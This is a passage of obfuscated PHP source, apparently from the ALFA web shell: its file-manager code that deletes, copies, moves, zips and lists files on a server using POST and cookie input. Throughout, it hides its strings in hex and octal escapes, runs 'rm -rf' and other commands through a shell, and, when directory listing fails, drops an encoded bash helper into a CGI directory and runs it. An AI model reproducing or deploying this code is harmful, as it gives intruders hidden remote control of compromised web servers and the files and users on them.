(@is_dir($f)) { deleteDir($f); } else { @unlink($f); } } } } if (@is_dir(rawurldecode(@$_POST["\x61\154\146\141\x32"])) && rawurldecode(@$_POST["\141\x6c\x66\141\x32"]) != "\x2e\56") { deleteDir(rawurldecode(@$_POST["\x61\154\146\x61\x32"])); alfaEx("\x72\x6d\x20\55\162\x66\40\47" . addslashes($_POST["\x61\x6c\146\141\x32"]) . "\x27", false, false); } else { @unlink(rawurldecode(@$_POST["\x61\x6c\146\x61\62"])); } if ($GLOBALS["\147\154\x6f\x62\x5f\x63\x68\x64\x69\x72\137\146\x61\x6c\163\x65"]) { $source = rawurldecode(@$_POST["\x61\154\146\141\x32"]); if ($source != "\56\x2e" && !empty($source)) { if (_alfa_can_runCommand(true, true)) { alfaEx("\x63\144\x20\x27" . trim(addslashes($_POST["\x63"])) . "\x27\73\162\x6d\x20\x2d\162\x66\40\47" . addslashes($source) . "\47"); } } } if (is_array($_POST["\146"])) { return; } break; case "\x70\141\x73\164\x65": if ($_COOKIE["\141\154\x66\x61\137\141\x63\164"] == "\143\157\160\x79" && isset($_COOKIE["\141\154\x66\x61\137\x66"])) { foreach ($_COOKIE["\x61\x6c\146\141\x5f\146"] as $f) { copy_paste($_COOKIE["\141\x6c\146\141\x5f\x63"], $f, $GLOBALS["\143\x77\x64"]); } } elseif ($_COOKIE["\141\x6c\x66\x61\x5f\x61\x63\164"] == "\x6d\157\166\x65" && isset($_COOKIE["\x61\154\146\141\137\146"])) { function move_paste($c, $s, $d) { if (@is_dir($c . $s)) { @mkdir($d . $s); $h = @opendir($c . $s); while (($f = @readdir($h)) !== false) { if ($f != "\56" and $f != "\x2e\56") { copy_paste($c . $s . "\x2f", $f, $d . $s . "\x2f"); } } } elseif (@is_file($c . $s)) { @copy($c . $s, $d . $s); } } foreach ($_COOKIE["\141\154\146\141\x5f\x66"] as $f) { @rename($_COOKIE["\x61\154\x66\x61\137\143"] . $f, $GLOBALS["\143\167\x64"] . $f); } } elseif ($_COOKIE["\x61\154\x66\x61\x5f\x61\143\x74"] == "\x7a\151\160" && isset($_COOKIE["\141\154\x66\141\x5f\x66"])) { if (class_exists("\132\x69\x70\x41\162\x63\x68\151\x76\x65")) { $zip = new ZipArchive(); $zipX = "\141\154\146\141\x5f" . rand(1, 1000) . "\x2e\x7a\x69\x70"; if ($zip->open($zipX, 1)) { @chdir($_COOKIE["\141\154\x66\x61\x5f\143"]); foreach ($_COOKIE["\141\x6c\146\141\x5f\146"] as $f) { if ($f == "\56\x2e") { continue; } if (@is_file($_COOKIE["\x61\154\x66\141\137\143"] . $f)) { $zip->addFile($_COOKIE["\x61\154\x66\x61\x5f\x63"] . $f, $f); } elseif (@is_dir($_COOKIE["\x61\x6c\146\141\x5f\x63"] . $f)) { $iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f . "\x2f")); foreach ($iterator as $key => $value) { $key = str_replace("\x5c", "\57", realpath($key)); if (@is_dir($key)) { if (in_array(substr($key, strrpos($key, "\57") + 1), array("\x2e", "\56\56"))) { continue; } } else { $zip->addFile($key, $key); } } } } @chdir($GLOBALS["\143\x77\144"]); $zip->close(); __alert("\x3e\x3e\40" . $zipX . "\x20\x3c\74\40\151\163\x20\143\x72\145\141\164\145\144\56\56\56"); } } } elseif ($_COOKIE["\141\154\146\x61\x5f\141\143\x74"] == "\165\156\x7a\151\160" && isset($_COOKIE["\x61\154\146\141\137\x66"])) { if (class_exists("\132\151\x70\x41\x72\143\150\151\166\x65")) { $zip = new ZipArchive(); foreach ($_COOKIE["\141\x6c\146\141\137\x66"] as $f) { if ($zip->open($_COOKIE["\141\x6c\146\x61\x5f\x63"] . $f)) { $zip->extractTo($_COOKIE["\x61\154\146\141\x5f\x63\167\x64"]); $zip->close(); } } } } unset($_COOKIE["\x61\154\x66\x61\x5f\x66"]); break; default: if (!empty($_POST["\141\x6c\146\141\x31"])) { if (in_array($_POST["\141\154\146\141\x31"], array("\143\x6f\x70\x79", "\x6d\x6f\166\x65", "\172\151\160", "\165\x6e\172\151\160"))) { __alfa_set_cookie("\141\x6c\146\x61\x5f\x61\143\x74", @$_POST["\x61\154\146\x61\61"]); __alfa_set_cookie("\141\154\146\x61\x5f\146", @serialize($_POST["\x66"])); __alfa_set_cookie("\x61\154\x66\141\137\x63", @$_POST["\x63"]); return; } } break; } } $dirContent = @scandir(isset($_POST["\143"]) ? $_POST["\x63"] : $GLOBALS["\143\x77\144"]); if (preg_match("\43\50\56\52\51\x5c\57\x5c\x2e\x5c\x2e\43", $_POST["\x63"], $res)) { $path = explode("\x2f", $res[1]); array_pop($path); $_POST["\x63"] = implode("\x2f", $path); } $cmd_dir = false; if ($dirContent === false) { if (_alfa_can_runCommand(true, true)) { $tmp_getdir_path = @$_COOKIE["\x61\x6c\146\x61\143\x68\144\x69\162\137\142\141\x73\x68\x5f\x70\141\x74\150"]; @chdir(dirname($_SERVER["\123\x43\x52\x49\120\x54\x5f\x46\x49\x4c\x45\x4e\101\115\105"])); if (!isset($_COOKIE["\141\154\x66\141\143\150\x64\151\x72\x5f\142\x61\x73\x68"]) || @(!file_exists($tmp_getdir_path . "\x2f\x61\x6c\146\141\143\147\151\141\160\x69\x2f\147\x65\x74\144\x69\162\56\141\154\x66\x61"))) { $bash = "\x6a\132\124\x66\x62\65\163\167\105\115\145\x66\x34\x61\53\64\x75\x61\x59\153\123\155\155\123\x2f\131\x70\105\167\163\117\x6b\x71\126\116\146\x4f\53\x31\x68\123\x71\x4b\x4b\x67\x67\x6e\127\167\111\x34\x4d\105\x61\106\x70\x70\114\63\x76\166\71\x78\x66\125\x74\x73\131\x53\113\160\x4d\x57\150\x36\111\67\57\x4f\x39\x4f\71\166\143\x48\126\146\x76\170\x72\164\x43\x6a\x4a\x38\x6f\107\x78\x65\x70\x2f\146\x58\53\111\143\102\x54\x2b\x2f\x37\165\145\64\104\x64\x46\130\116\x74\x45\161\125\143\60\x42\114\132\103\x52\x64\x41\x67\x54\114\101\147\66\167\101\114\x77\121\x73\146\x59\x64\x7a\151\x4c\153\116\x38\162\143\x4e\x79\172\122\x41\x69\x6f\60\x78\x52\122\162\122\102\x4a\132\114\x77\102\x53\103\101\x4e\104\164\114\131\114\x72\x61\x2f\104\x32\x4d\162\65\x4b\x61\x5a\123\103\x49\107\107\143\x55\x66\132\x72\103\x4f\x76\x31\x48\x4d\x71\x55\115\102\x33\x56\x4a\x63\117\104\x31\x67\x4f\x38\x42\x4c\102\x69\x77\x38\x36\x44\x42\150\x70\x6f\117\x36\107\x32\x52\126\x6e\x43\x5a\125\122\122\150\x69\126\x34\105\x53\104\156\x7a\x6e\x64\x2b\x2b\115\x34\x33\x33\171\154\x38\x35\66\x63\57\x63\x55\x4c\x66\x2b\x59\x4c\141\114\x4a\141\x36\156\x2b\x75\67\53\x67\172\x67\x43\130\127\x64\125\111\151\167\x68\x73\126\151\x41\x51\x69\162\x62\x4d\x69\x32\x79\x6e\160\114\101\156\x7a\x51\x79\156\113\x79\120\165\x72\144\x65\115\127\111\x36\x4f\152\x55\x30\111\63\x67\x75\x32\61\x48\x33\x30\164\x71\x46\146\123\x35\x6a\x2f\66\147\123\115\x35\x6a\155\164\121\144\53\x32\x68\x69\x74\60\124\153\142\x4a\x64\x33\57\116\x4d\112\x54\x33\144\65\x79\104\162\154\x73\61\105\131\161\x52\65\67\x31\130\127\x62\61\x79\x41\x4c\116\x42\x67\x41\x70\x63\106\153\114\160\70\114\146\x4c\x6a\161\x66\111\66\113\x6a\105\x59\167\x37\101\x76\x32\112\x73\x74\x49\x46\x75\57\x51\127\x54\66\155\x31\x4a\70\x65\57\x2f\67\53\x30\x35\x51\171\65\x6f\x79\70\120\144\x4e\x5a\x75\x4b\x78\x41\x55\62\61\x7a\x47\x56\63\x7a\171\x58\x51\x32\155\x36\x47\x2b\166\x4a\142\126\x58\x68\x56\116\x6c\107\112\x41\153\167\x2f\x46\x51\155\65\130\x37\145\126\104\x56\x50\x4b\170\x46\65\126\x30\60\x4c\x58\126\x6d\x62\61\113\x46\x6b\141\x56\124\171\x56\x55\162\141\123\x59\x4f\x47\106\156\x6d\x30\x51\70\x34\171\x4a\101\x65\125\x6a\132\x34\60\x59\121\x77\166\122\x52\x5a\125\113\123\155\x58\x54\57\106\123\x6f\x37\x74\123\x52\x39\x61\x45\x45\x75\x2b\x41\x67\123\164\170\x37\x39\x61\142\110\161\110\146\60\123\131\x69\160\111\x56\x48\x4a\122\x6e\62\x32\153\x57\60\x74\160\x4a\60\146\161\x59\167\124\x5a\67\114\x4a\x51\171\115\67\117\x69\x4c\67\x75\171\x38\x74\x6c\x42\x35\112\x76\171\57\x72\146\x62\x6b\x57\144\x50\57\107\x4d\122\x71\103\155\x36\x4d\x4c\x2b\x4f\162\x41\x35\x74\x70\x37\x7a\x77\x77\161\170\x4d\x43\x63\x72\x35\x4d\116\x4b\124\x73\x45\113\63\143\150\x2f\x35\127\160\x49\x73\x31\122\121\x54\64\x47\x68\x5a\x71\x32\x77\110\147\x4f\x44\172\126\160\150\116\x51\x71\x47\x4e\x6b\x73\x46\x6d\62\153\x77\165\x44\x57\125\x59\112\x72\105\x4b\112\x33\126\x53\162\x70\x64\124\153\122\152\x74\x37\111\165\172\x59\x6c\x73\x37\117\117\116\162\132\165\x34\53\x5a\x34\144\x6a\155\166\60\x43\147\x3d\75"; $tmp_getdir_path = alfaWriteTocgiapi("\x67\x65\x74\x64\x69\x72\56\x61\x6c\146\x61", $bash); __alfa_set_cookie("\141\x6c\146\x61\x63\150\x64\x69\x72\x5f\142\141\x73\150", "\164\x72\165\x65"); __alfa_set_cookie("\x61\154\x66\141\143\x68\x64\151\x72\x5f\142\x61\x73\x68\x5f\x70\141\164\150", $tmp_getdir_path); } $dirContent = alfaEx("\x63\144\x20" . $tmp_getdir_path . "\x2f\141\154\x66\x61\143\x67\x69\141\160\151\73\163\x68\40\147\145\164\x64\151\162\x2e\141\x6c\x66\141\x20\x27" . addslashes(isset($_POST["\143"]) ? $_POST["\143"] : $GLOBALS["\x63\167\144"]) . "\x27"); $dirContent = json_decode($dirContent, true); if (is_array($dirContent)) { array_pop($dirContent); $cmd_dir = true; } else { $dirContent = false; } } } alfahead(); AlfaNum(8, 9, 10, 7, 6, 5, 4); $count_dirContent = @count($dirContent); if ($count_dirContent > 300) { @($_COOKIE["\141\154\x66\141\x5f\154\x69\x6d\x69\164\145\144\x5f\146\151\154\145\163"] = 100); } $alfa_sort_by = isset($_COOKIE["\141\154\146\141\x5f\x73\x6f\x72\164\137\142\171"]) ? $_COOKIE["\141\x6c\146\141\x5f\163\157\162\164\x5f\142\x79"] : "\156\x61\x6d\145"; $alfa_limited_files = isset($_COOKIE["\x61\154\146\141\x5f\154\151\155\x69\164\145\x64\x5f\x66\x69\x6c\x65\163"]) ? (int) $_COOKIE["\x61\154\x66\141\x5f\x6c\x69\x6d\151\164\145\x64\x5f\x66\x69\x6c\145\x73"] : 0; $alfa_files_page_number = isset($_POST["\x70\141\x67\x65\x6e\165\x6d"]) ? (int) $_POST["\160\x61\x67\x65\x6e\x75\x6d"] : 1; $alfa_filesman_direction = isset($_COOKIE["\141\154\x66\x61\x5f\x66\x69\154\145\163\155\x61\156\x5f\144\x69\x72\145\x63\164\151\157\156"]) ? $_COOKIE["\141\x6c\146\141\137\146\x69\x6c\x65\163\155\141\156\x5f\144\x69\x72\x65\x63\164\151\x6f\156"] : "\x61\163\143"; $files_page_count = 1; if ($alfa_limited_files > 0) { $files_page_count = ceil($count_dirContent / $alfa_limited_files); if ($files_page_count > 1) { $files_page_count++; } } echo "\74\x64\x69\166\x3e\x3c\x64\x69\166\40\x63\154\141\x73\x73\x3d\x22\x66\151\x6c\164\145\x72\x73\55\x68\157\x6c\x64\145\x72\x22\x3e\74\x73\x70\141\156\76\106\151\154\164\x65\162\x3a\x20\74\x2f\x73\160\x61\x6e\76\74\151\156\x70\165\164\40\163\x74\171\154\x65\x3d\42\143\157\154\x6f\162\72\43\62\65\x66\x66\60\60\x3b\x22\40\141\165\x74\x6f\x63\157\155\x70\x6c\x65\x74\145\75\x22\x6f\146\x66\42\x20\164\171\x70\145\75\42\x74\145\x78\164\42\x20\x69\144\75\x22\162\x65\147\145\170\x2d\146\151\154\x74\x65\162\x22\x20\x6e\x61\x6d\x65\75\42\x6e\141\x6d\145\x2d\146\x69\154\164\x65\162\42\40\157\x6e\153\x65\x79\x64\157\167\156\75\42\144\x6f\106\x69\x6c\x74\145\162\x4e\x61\x6d\x65\x28\x74\x68\x69\163\x29\73\42\x3e\x3c\163\x70\141\156\40\x73\x74\171\154\x65\x3d\x22\155\x61\x72\147\x69\156\x2d\154\145\146\x74\x3a\x31\60\x70\170\42\76\x53\157\x72\164\x20\x42\171\x3a\x20\74\57\163\160\141\156\x3e\x3c\163\x65\x6c\145\143\x74\40\x6e\x61\x6d\145\x3d\x22\x73\x6f\162\x74\137\146\x69\154\145\x73\x22\x20\157\x6e\x63\150\141\156\x67\145\75\42\163\x6f\162\164\x42\171\x53\x65\x6c\x65\143\164\145\x64\126\141\154\165\145\50\164\x68\151\x73\x2c\x27\x61\x6c\146\141\x5f\x73\157\x72\x74\x5f\x62\x79\47\51\73\42\40\163\164\x79\x6c\145\x3d\x22\x63\157\x6c\157\162\x3a\43\x32\65\x66\x66\60\60\73\42\76\74\157\x70\x74\x69\157\156\x20\166\x61\154\165\x65\x3d\42\156\141\x6d\x65\42\40" . ($alfa_sort_by == "\156\141\155\x65" ? "\163\145\154\145\143\x74\145\x64" : '') . "\x3e\x4e\x61\155\x65\74\57\x6f\x70\164\151\157\x6e\x3e\x3c\157\x70\x74\151\157\156\40\x76\x61\x6c\165\x65\75\42\x73\151\172\x65\42\x20" . ($alfa_sort_by == "\163\151\172\145" ? "\x73\145\154\145\x63\x74\x65\x64" : '') . "\76\x53\x69\x7a\145\74\57\x6f\160\164\151\157\156\x3e\x3c\x6f\x70\x74\x69\157\x6e\x20\166\x61\x6c\x75\x65\75\42\155\x6f\144\151\146\x79\42\x20" . ($alfa_sort_by == "\155\x6f\144\151\x66\171" ? "\163\x65\x6c\145\x63\164\x65\x64" : '') . "\x3e\115\x6f\x64\x69\x66\171\x3c\x2f\157\160\x74\151\x6f\x6e\76\74\x2f\x73\145\154\145\x63\164\76\74\163\x70\x61\x6e\40\x73\x74\171\x6c\x65\x3d\42\155\x61\162\147\x69\156\55\x6c\x65\146\x74\x3a\61\60\x70\x78\x22\76\x44\x69\162\x65\x63\x74\x69\x6f\156\72\40\x3c\x2f\163\x70\141\x6e\x3e\x3c\x73\145\x6c\145\x63\x74\x20\x6e\141\x6d\x65\75\x22\144\x69\x72\x65\143\164\151\x6f\156\137\146\151\x6c\x65\x73\155\x61\x6e\42\x20\x6f\156\103\x68\x61\x6e\x67\145\x3d\42\163\157\x72\164\x42\171\x53\x65\x6c\x65\143\x74\x65\x64\126\x61\154\x75\145\50\164\150\x69\163\x2c\x27\141\154\146\141\137\146\151\154\145\x73\155\x61\156\x5f\144\151\x72\x65\x63\164\151\157\156\47\51\42\40\x73\x74\171\154\x65\75\42\143\x6f\154\x6f\162\72\43\x32\65\x66\x66\60\60\x3b\42\x3e\x3c\x6f\x70\164\151\157\156\40\x76\141\x6c\x75\x65\x3d\x22\141\x73\x63\42\40" . ($alfa_filesman_direction == "\141\x73\143" ? "\163\145\154\x65\x63\164\x65\144" : '') . "\76\x41\x73\143\x65\156\x64\x69\156\x67\x3c\57\x6f\160\164\x69\157\x6e\76\74\157\160\x74\151\157\x6e\40\x76\141\154\165\x65\x3d\42\144\x65\x73\143\42\x20" . ($alfa_filesman_direction == "\144\145\x73\143" ? "\x73\145\x6c\x65\143\x74\x65\144" : '') . "\x3e\x44\145\163\143\x65\x6e\144\151\x6e\x67\x3c\x2f\x6f\x70\x74\x69\157\156\76\74\x2f\163\145\x6c\145\x63\164\76\74\163\160\x61\x6e\40\x73\164\x79\154\145\x3d\x22\x6d\141\162\x67\151\x6e\55\154\145\146\x74\72\61\60\x70\x78\x3b\x22\x3e\x20\154\151\155\x69\164\x3a\x20\74\57\x73\160\x61\x6e\x3e\74\151\156\x70\x75\x74\x20\x73\164\x79\154\x65\x3d\42\x74\145\170\x74\x2d\141\x6c\x69\147\156\72\x63\x65\x6e\x74\145\x72\x3b\x77\x69\144\164\150\x3a\x20\64\60\160\170\x3b\143\157\x6c\157\162\x3a\x23\x32\65\146\146\x30\60\73\x22\x20\x74\171\x70\145\x3d\x22\164\x65\170\164\x22\40\x6e\x61\155\x65\x3d\42\x6c\151\155\x69\164\x65\x64\x5f\156\165\155\x62\145\162\x22\x20\166\141\x6c\165\145\x3d\x22" . $alfa_limited_files . "\x22\x20\157\156\x69\156\x70\165\x74\75\42\x74\150\151\163\x2e\x76\141\154\x75\145\x3d\164\150\151\x73\56\x76\x61\x6c\x75\145\x2e\x72\x65\x70\154\x61\x63\145\50\x2f\133\x5e\60\55\71\135\57\x67\x2c\x27\x27\x29\x3b\x73\145\164\103\x6f\157\153\151\x65\x28\x27\141\x6c\x66\141\137\x6c\x69\x6d\151\x74\145\x64\x5f\x66\x69\x6c\145\x73\x27\54\40\164\x68\151\163\56\166\x61\154\x75\x65\x2c\40\x32\x30\x31\62\x29\x3b\x22\76\74\x73\160\141\156\x20\x73\164\171\154\145\75\x22\155\x61\x72\x67\151\156\x2d\x6c\145\146\164\72\61\x30\160\x78\73\x22\x3e\x46\x69\154\145\163\x20\x43\x6f\x75\156\x74\x3a\x20\x3c\x62\40\163\164\171\x6c\x65\75\42\x63\157\154\x6f\x72\72\43\x32\65\x66\146\x30\x30\x3b\x22\x3e" . ($count_dirContent - 1) . "\74\57\x62\x3e\74\57\x73\x70\141\156\76\74\57\x64\x69\166\x3e\74\144\x69\x76\40\x63\154\141\x73\163\x3d\x22\150\145\x61\x64\145\x72\42\x3e"; if ($dirContent == false) { echo "\x3c\143\145\156\x74\x65\x72\76\x3c\142\162\76\x3c\163\160\141\x6e\x20\163\164\x79\x6c\x65\75\x22\146\157\156\164\x2d\x73\151\172\x65\72\61\x36\160\170\x3b\42\76\74\163\x70\141\156\40\163\x74\171\x6c\145\x3d\x22\143\x6f\154\x6f\162\x3a\40\162\145\144\x3b\x20\55\x77\145\x62\x6b\151\164\55\x74\145\x78\x74\55\x73\150\x61\x64\157\167\72\40\x31\x70\x78\x20\61\160\170\40\61\x33\160\170\73\42\x3e\x3c\163\x74\162\x6f\x6e\147\76\74\142\x3e\74\142\151\x67\76\41\41\41\40\101\x63\143\145\163\x73\x20\104\145\156\151\x65\x64\x20\41\41\x21\x3c\57\142\76\74\57\x62\151\x67\x3e\x3c\142\162\x3e\x3c\x62\x72\76\74\57\163\164\x72\x6f\156\x67\x3e\x3c\57\x64\151\166\x3e"; alfaFooter(); return; } global $sort; $sort = array("\156\141\155\145", 1); if (isset($_COOKIE["\x61\x6c\146\141\137\x73\x6f\x72\164\x5f\x62\x79"]) && !empty($_COOKIE["\x61\x6c\x66\x61\137\x73\x6f\162\x74\137\142\171"])) { $sort[0] = $_COOKIE["\141\154\x66\x61\137\163\x6f\162\164\x5f\x62\x79"]; } if (!empty($_POST["\x61\154\x66\141\x31"])) { if (preg_match("\41\163\137\50\133\x41\55\172\135\53\51\x5f\50\x5c\144\173\x31\x7d\x29\41", $_POST["\141\x6c\x66\141\x31"], $match)) { $sort = array($match[1], (int) $match[2]); } } if ($alfa_files_page_number > $files_page_count - 1) { $alfa_files_page_number = 1; } $checkbox_rand = rand(11111, 99999); echo "\x3c\x66\157\x72\x6d\x20\157\x6e\x73\x75\142\x6d\x69\164\75\x27\x66\143\x28\164\x68\151\163\x29\x3b\x72\145\164\165\162\x6e\40\x66\141\154\x73\x65\x3b\47\x20\x6e\141\155\x65\x3d\47\x66\x69\154\145\163\47\40\x6d\145\164\150\x6f\x64\x3d\x27\x70\157\x73\164\x27\x3e\74\164\x61\142\x6c\x65\40\151\x64\x3d\47\146\151\154\145\x6d\141\x6e\141\147\x65\162\137\x74\x61\x62\154\145\x27\40\167\151\x64\x74\x68\x3d\47\61\60\x30\45\x27\40\143\x6c\x61\163\163\75\x27\x6d\x61\x69\156\x27\x20\x63\145\154\x6c\x73\160\x61\143\151\156\147\75\x27\60\x27\40\x63\x65\x6c\154\160\141\144\144\151\156\x67\x3d\x27\62\47\x3e\74\164\x72\x3e\74\164\150\40\167\x69\x64\x74\x68\75\47\x31\63\x70\x78\x27\x3e\74\x64\x69\x76\40\143\154\x61\163\163\x3d\47\x6d\171\x43\150\x65\x63\x6b\142\x6f\x78\47\x20\x73\164\x79\x6c\145\75\47\160\x61\x64\x64\x69\156\x67\55\154\x65\x66\164\72\60\160\170\73\47\76\x3c\x69\156\x70\x75\164\40\164\x79\x70\x65\75\47\143\150\x65\143\153\142\x6f\x78\47\40\x69\144\75\47\x6d\143\x68\x6b" . $checkbox_rand . "\x27\40\157\x6e\143\154\151\x63\153\x3d\47\x63\x68\x65\143\x6b\102\157\170\x28\x74\x68\151\163\x29\73\47\40\143\154\x61\163\163\75\47\143\x68\153\x62\x78\47\76\x3c\154\141\142\x65\x6c\x20\x66\x6f\x72\x3d\x27\x6d\143\150\153" . $checkbox_rand . "\x27\76\74\x2f\154\141\142\145\154\76\x3c\x2f\x64\151\x76\x3e\x3c\x2f\164\x68\x3e\x3c\x74\150\x3e\116\141\x6d\x65\74\57\x74\x68\x3e\74\164\x68\76\x53\151\172\x65\74\57\x74\150\x3e\74\x74\150\76\x4d\x6f\144\151\x66\171\x3c\57\164\x68\x3e\x3c\164\150\x3e\117\x77\x6e\x65\162\57\x47\162\157\x75\160\x3c\57\x74\150\76\x3c\x74\x68\x3e\x50\x65\162\x6d\151\x73\x73\x69\157\156\163\74\57\x74\150\x3e\74\164\150\x3e\101\x63\164\151\157\x6e\163\x3c\57\x74\150\76\x3c\57\x74\x72\x3e"; $dirs = $files = array(); $n = $count_dirContent; if ($n > $alfa_limited_files && $alfa_limited_files > 0) { $n = $alfa_limited_files * $alfa_files_page_number; if ($n > $count_dirContent) { $n = $count_dirContent; } } $i = 0; if ($alfa_limited_files > 0 && $alfa_files_page_number > 1) { $i = $alfa_limited_files * ($alfa_files_page_number - 1); } $page_builder = get_pagination_links($alfa_files_page_number, $files_page_count - 1); $cmd_dir_backp = ''; for (; $i < $n; $i++) { if ($cmd_dir) { $filename = $dirContent[$i]["\x6e\141\155\x65"]; $file_owner = $dirContent[$i]["\x6f\x77\156\x65\x72"]; $file_group = $dirContent[$i]["\x67\x72\x6f\x75\160"]; $file_modify = @date("\x59\x2d\155\x2d\x64\x20\110\72\151\x3a\x73", $dirContent[$i]["\x6d\x6f\x64\151\x66\x79"]); $file_perm = alfaPermsColor(array("\x63\x6c\x61\x73\163" => $dirContent[$i]["\160\x65\162\x6d\x63\x6f\x6c\157\x72"], "\156\x75\155" => $dirContent[$i]["\160\145\x72\155\156\x75\155"], "\x68\x75\155\141\156" => $dirContent[$i]["\x70\145\x72\155\150\x75\x6d\141\x6e"]), true); $file_size = $dirContent[$i]["\163\151\x7a\145"]; if (substr($dirContent[$i]["\x6e\141\x6d\145"], 0, 1) == "\x2f") { $file_path = $dirContent[$i]["\156\x61\x6d\145"]; $dirContent[$i]["\156\x61\155\145"] = "\56\x2e"; $filename = $dirContent[$i]["\x6e\141\x6d\x65"]; } else { $file_path = $GLOBALS["\x63\167\144"] . "\57" . $dirContent[$i]["\156\x61\155\x65"]; } } else { $filename = $dirContent[$i]; $ow = function_exists("\x70\x6f\163\151\x78\137\147\x65\x74\160\x77\165\151\x64") && function_exists("\x66\x69\x6c\145\x6f\x77\156\145\x72") ? @posix_getpwuid(@fileowner($GLOBALS["\x63\x77\x64"] . $filename)) : array("\156\x61\155\x65" => "\77\77\77\77"); $gr = function_exists("\x70\157\163\x69\x78\x5f\x67\145\x74\147\162\147\151\144") && function_exists("\146\151\154\145\x67\162\x6f\x75\x70") ? @posix_getgrgid(@filegroup($GLOBALS["\143\167\144"] . $filename)) : array("\156\141\155\x65" => "\x3f\77\x3f\x3f"); $file_owner = $ow["\x6e\141\x6d\x65"] ? $ow["\x6e\x61\x6d\x65"] : (function_exists("\x66\x69\x6c\x65\x6f\167\156\x65\162") ? @fileowner($GLOBALS["\x63\x77\144"] . $filename) : "\77\77\77\77"); $file_group = $gr["\156\141\155\145"] ? $gr["\156\x61\x6d\145"] : (function_exists("\x66\x69\154\145\x67\x72\157\165\x70") ? @filegroup($GLOBALS["\143\167\144"] . $filename) : "\77\77\x3f\77"); $file_modify = @date("\x59\x2d\x6d\x2d\x64\x20\x48\72\151\x3a\163", @filemtime($GLOBALS["\x63\167\144"] . $filename)); $file_perm = alfaPermsColor($GLOBALS["\x63\167\144"] . $filename); $file_size = @filesize($GLOBALS["\x63\167\144"] . $filename); $file_path = $GLOBALS["\x63\x77\144"] . $filename; } $tmp = array("\156\141\x6d\x65" => $filename, "\160\141\x74\x68" => $file_path, "\x6d\157\x64\x69\146\x79" => $file_modify, "\x70\145\x72\x6d\163" => $file_perm, "\163\151\172\145" => $file_size, "\x6f\167\156\x65\x72" => $file_owner, "\147\x72\157\x75\160" => $file_group); if ($filename == "\x2e\56" && !$cmd_dir) { $tmp["\x70\141\164\x68"] = str_replace("\x5c", "\x2f", realpath($file_path)); } if (!$cmd_dir) { if (@is_file($file_path)) { $arr_mrg = array("\x74\x79\x70\x65" => "\x66\151\x6c\x65"); if (@is_link($file_path)) { $arr_mrg["\x6c\151\x6e\153"] = readlink($tmp["\x70\141\164\x68"]); } $files[] = array_merge($tmp, $arr_mrg); } elseif (@is_link($file_path)) { $dirs[] = array_merge($tmp, array("\164\171\x70\145" => "\x6c\151\x6e\x6b", "\154\151\x6e\x6b" => readlink($tmp["\x70\x61\164\x68"]))); } elseif (@is_dir($file_path) && $filename != "\56") { $dirs[] = array_merge($tmp, array("\x74\171\x70\x65" => "\144\x69\x72")); } } else { if ($dirContent[$i]["\x74\171\x70\x65"] == "\146\151\x6c\x65") { $files[] = array_merge($tmp, array("\164\x79\x70\145" => "\146\x69\x6c\x65")); } else { if ($dirContent[$i]["\156\141\x6d\x65"] != "\56") { $dirs[] = array_merge($tmp, array("\164\171\160\x65" => "\x64\151\162")); } } } } $GLOBALS["\x73\x6f\x72\x74"] = $sort; function alfaCmp($a, $b) { if ($GLOBALS["\163\x6f\x72\164"][0] != "\x73\151\172\x65") { return strcmp(strtolower($a[$GLOBALS["\x73\x6f\x72\164"][0]]), strtolower($b[$GLOBALS["\163\157\x72\x74"][0]])) * ($GLOBALS["\x73\157\162\x74"][1] ? 1 : -1); } else { return ($a["\163\x69\172\x65"] < $b["\163\x69\172\x65"] ? -1 : 1) * ($GLOBALS["\x73\157\162\164"][1] ? 1 : -1); } } usort($files, "\x61\154\x66\141\x43\155\160"); usort($dirs, "\x61\154\146\141\x43\155\x70"); if (isset($_COOKIE["\x61\x6c\x66\x61\x5f\x66\x69\x6c\145\163\155\141\156\137\144\151\162\145\x63\164\151\157\156"]) && !empty($_COOKIE["\141\x6c\x66\x61\137\x66\x69\154\x65\163\x6d\x61\156\x5f\144\151\162\145\x63\x74\x69\157\156"])) { if ($_COOKIE["\141\154\146\141\x5f\x66\x69\154\x65\x73\155\x61\156\x5f\144\x69\x72\x65\143\x74\151\x6f\x6e"] == "\144\x65\163\x63") { $files = array_reverse($files); $dirs = array_reverse($dirs); } } $files = array_merge($dirs, $files); $l = 0; $cc = 0; foreach ($files as $f) { $f["\156\141\x6d\145"] = htmlspecialchars($f["\x6e\141\155\145"]); $newname = mb_strlen($f["\156\141\155\x65"], "\x55\x54\x46\55\x38") > 60 ? mb_substr($f["\156\x61\155\x65"], 0, 60, "\165\164\146\55\70") . "\56\56\56" : $f["\x6e\141\155\x65"]; $checkbox = "\143\x68\145\x63\153\x62\157\170\137" . $checkbox_rand . $cc; $raw_name = rawurlencode($f["\156\x61\155\145"]); $icon = $GLOBALS["\104\x42\x5f\116\x41\x4d\105"]["\x73\x68\x6f\x77\137\151\x63\x6f\156\x73"] ? "\74\151\x6d\147\x20\163\x72\143\x3d\x22" . findicon($f["\156\141\x6d\145"], $f["\164\171\160\x65"]) . "\x22\40\167\x69\x64\164\150\x3d\42\x33\60\42\40\x68\145\x69\147\150\x74\75\x22\63\x30\x22\76" : ''; $style = $GLOBALS["\x44\x42\137\116\x41\x4d\105"]["\x73\150\157\x77\137\151\x63\x6f\x6e\163"] ? "\x70\157\x73\151\164\x69\x6f\x6e\x3a\x72\x65\154\x61\164\x69\166\145\73\144\151\163\160\154\x61\x79\x3a\x69\156\x6c\151\x6e\145\x2d\142\154\x6f\143\153\73\x62\x6f\x74\164\157\155\x3a\61\x32\x70\x78\x3b" : ''; echo "\x3c\164\162\40\143\x6c\x61\163\x73\75\42\146\155\141\156\141\x67\x65\x72\x2d\x72\x6f\x77\x22\x20\151\144\75\x22\x74\162\x5f\162\157\167\137" . $cc . "\42\x3e\74\164\x64\76\x3c\144\151\166\40\143\154\x61\x73\x73\x3d\42\155\171\103\150\x65\x63\153\142\157\170\42\76\74\151\156\160\x75\x74\40\x74\x79\x70\145\x3d\42\143\x68\145\x63\153\x62\x6f\170\x22\x20\x6e\141\155\x65\x3d\42\x66\133\x5d\42\x20\166\x61\154\165\145\75\x22" . $raw_name . "\x22\40\143\x6c\x61\x73\x73\x3d\42\x63\x68\x6b\142\170\x22\40\151\144\x3d\x22" . $checkbox . "\x22\76\x3c\x6c\141\142\145\x6c\40\146\157\162\x3d\42" . $checkbox . "\x22\x3e\74\57\154\x61\142\145\154\76\x3c\x2f\x64\x69\166\76\x3c\57\164\x64\76\x3c\x74\144\x20\x69\144\75\x22\x74\144\137\162\157\x77\137" . $cc . "\42\76" . $icon . 